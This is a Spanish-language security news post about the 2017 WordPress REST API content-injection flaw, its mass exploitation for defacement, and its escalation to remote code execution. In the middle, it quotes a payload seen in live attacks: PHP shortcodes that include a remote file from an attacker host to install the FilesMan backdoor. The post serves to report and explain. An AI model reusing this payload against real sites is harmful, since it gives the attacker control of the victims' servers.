Hacking Land - Hack, Crack and Pentest

Hacking Land - Hack, Crack and Pentest

¿Recuerdan cuándo todo se hackeaba con Telnet y una IP? Pues bueno, hoy no...

  • Home
    • Vídeos
    • Exploits
    • Windows
    • Linux
    • Android
    • iPhone
    • Others
    • _Wireless
    • _SQLi
    • _Linux Distribution
    • _XSS
    • _DDoS
    • _OSINT
    • _Malware
    • _Scanners

    Home / Unlabelled / El 0-Day de WordPress permite el hackeo de 1,5 millones de sitios web

    El 0-Day de WordPress permite el hackeo de 1,5 millones de sitios web

    13:54 Zion3R
    Facebook


    El reciente grave fallo de seguridad de WordPress ha sido explotado masivamente para hackear más de 1,5 millones de sitios web. De acuerdo con la firma de seguridad WordFence, el fallo de inyección de contenido en WordPress recientemente divulgada ya ha sido explotada de forma masiva.





    Grave Vulnerabiliad en WordPress REST API


    • https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html

    Con el fin de evitar la exposición de los sitios web, la comunidad de WordPress retrasó más de una semana la divulgación de la vulnerabilidad para trabajar con expertos en seguridad y compañías de hosting en la creación de un parche definitivo, que tendría que ser libreado poco después de que la vulnerabilidad se hiciera pública.

    La vulnerabilidad fue descubierta por un investigador de seguridad en la empresa Sucuri, quien explicó que el fallo podría ser explotada por un atacante no autenticado para inyectar contenido malicioso así como para la escalada de privilegios.

    El atacante podría explotar el fallo de inyección de contenido de día cero para modificar publicaciones, páginas, así como cualquier otro contenido.

    La API REST está habilitada de forma predeterminada en todos los sitios que usan WordPress 4.7 o 4.7.1. Si su sitio web está en estas versiones de WordPress entonces es actualmente vulnerable a este error. "

    Al menos 18 millones de sitios web ejecutan el popular WordPress CMS, aproximadamente el 26% de los 10.000 sitios web principales ejecutan WordPress.

    Expertos de Sucuri han trabajado con el equipo de desarrollo de WordPress que fijó la vulnerabilidad de inyección de contenido cero en la última versión 4.7.2 emitida el 26 de enero.

    La mala noticia es que muchos sitios web de WordPress aún no han sido actualizados dejando la instalación abierta a los ataques.

    Expertos de Sucuri informaron de los primeros ataques aprovechando la vulnerabilidad anterior menos de 48 horas después de su divulgación.

    "En menos de 48 horas después de que se revelara la vulnerabilidad, vimos múltiples exploits públicos compartidos y publicados en línea. Con esa información fácilmente disponible, se iniciaron los intentos de sondaje y explotación a nivel de Internet ", afirma un informe publicado por Sucuri.

    Los expertos observaron varias campañas de desfiguración masivas dirigidas a WordPress en todo el mundo, en una de estas campañas, los hackers reemplazaron el contenido de más de 60.000 páginas web con declaraciones "Hacked by".





    Los atacantes han encontrado una manera de escalar la falla benigna de WordPress REST API y usarla para obtener acceso completo al servidor de una víctima mediante la instalación de una puerta trasera oculta. El 26 de enero, el equipo de WordPress lanzó WordPress 4.7.2, que contenía una corrección secreta que abordaba una vulnerabilidad en la API de WordPress REST.


    Debido a que el equipo de WordPress temía que los atacantes explotaran este fallo de inmediato, no incluyeron detalles sobre el error en el anuncio original y sólo revelaron su presencia después de una semana, después de que un número sustancial de usuarios actualizaron sus blogs.


    La gran mayoría de estos ataques habían sido ataques sencillos, en los que las tripulaciones de hacking sólo garabateaban su nombre en un sitio, y nada más.

    Los ataques de WordPress REST API se vuelven más desagradables

    Hacia el final de la semana pasada, las cosas se pusieron feas, de acuerdo con la empresa de seguridad de WordPress, Sucuri, quien reportó haber visto los primeros ataques que también involucraron intentos de ejecución remota de código.

    Según Sucuri, los atacantes estaban elaborando mensajes especiales de degradación que incluían una lista de códigos cortos de WordPress.

    Después de una mirada más atenta a estos códigos cortos, el equipo de Sucuri se dio cuenta de que eran los códigos cortos de los complementos de WordPress que permitían a los webmasters incluir código PHP personalizado dentro del contenido de texto de sus páginas y que el motor de WordPress lo ejecutara.

    En términos más simples, los atacantes encontraron una forma de enviar su propio código PHP a los sitios de WordPress a través de la falla REST API, que hasta entonces sólo se utilizaba para alterar el texto preexistente.

    Contenido: "[insert_php] include ('http [:] // acommeamour.fr/tmp/xx.php'); [/ insert_php]
    [Php] include ('http [:] // acommeamour.fr/tmp/xx.php'); [/ Php] ",
    "Id": "61a"}

    El fragmento de código fuente anterior, visto en ataques en vivo, diría al motor de WordPress que ejecute el siguiente comando de PHP cada vez que un usuario acceda a esa página en particular.

    Include ('http [:] // acommeamour.fr/tmp/xx.php');

    Esta línea de código PHP incluiría un archivo PHP remoto en el sitio de la víctima, el cual descargaría e instalaría la puerta trasera de FilesMan PHP en la carpeta WordPress / wp-content / uploads /.

    Después de enviar su solicitud HTTP a la API REST de WordPress de un sitio, un atacante sólo tendría que acceder a la página desfigurada una vez y, a continuación, acceder a la puerta trasera y asumir el control del servidor subyacente de la víctima.


    Fuentes:
    https://www.bleepingcomputer.com/news/security/wordpress-rest-api-flaw-used-to-install-backdoors/
    http://securityaffairs.co/wordpress/56166/hacking/wordpress-flaw.html

    Via: blog.elhacker.net
    El 0-Day de WordPress permite el hackeo de 1,5 millones de sitios web El 0-Day de WordPress permite el hackeo de 1,5 millones de sitios web Reviewed by Zion3R on 13:54 Rating: 5

    Tags
    Facebook


    Follow @VideosHacking

    Most Popular

    • Open Redirect Payload List
      Open Redirect Payload List
      Unvalidated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application t...
    • Username Anarchy - Username Tools For Penetration Testing
      Username Anarchy - Username Tools For Penetration Testing
      Tools for generating usernames when penetration testing. Usernames are half the password brute force problem. This is useful for user ...
    • netattack - Scan and Attack Wireless Networks
      netattack - Scan and Attack Wireless Networks
      The netattack.py is a python script that allows you to scan your local area for WiFi Networks and perform deauthentification attacks. Th...
    • BBQSQL - A Blind SQL Injection Exploitation Tool
      BBQSQL - A Blind SQL Injection Exploitation Tool
      Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don't you have to write someth...
    • GyoiThon - A Growing Penetration Test Tool Using Machine Learning
      GyoiThon - A Growing Penetration Test Tool Using Machine Learning
      GyoiThon is a growing penetration test tool using Machine Learning . GyoiThon identifies the software installed on web server (OS,...

    Blog Archive

    Recommended

    1. Dreamhost: Best WordPress Hosting
    2. SSD cloud server on DigitalOcean
    3. Exploit Collector
    4. BlackPloit
    5. Hacking Land
    6. Daily Picture

    Total Pageviews

    Copyright © Hacking Land - Hack, Crack and Pentest

    Back To Top
    Con la tecnología de Blogger.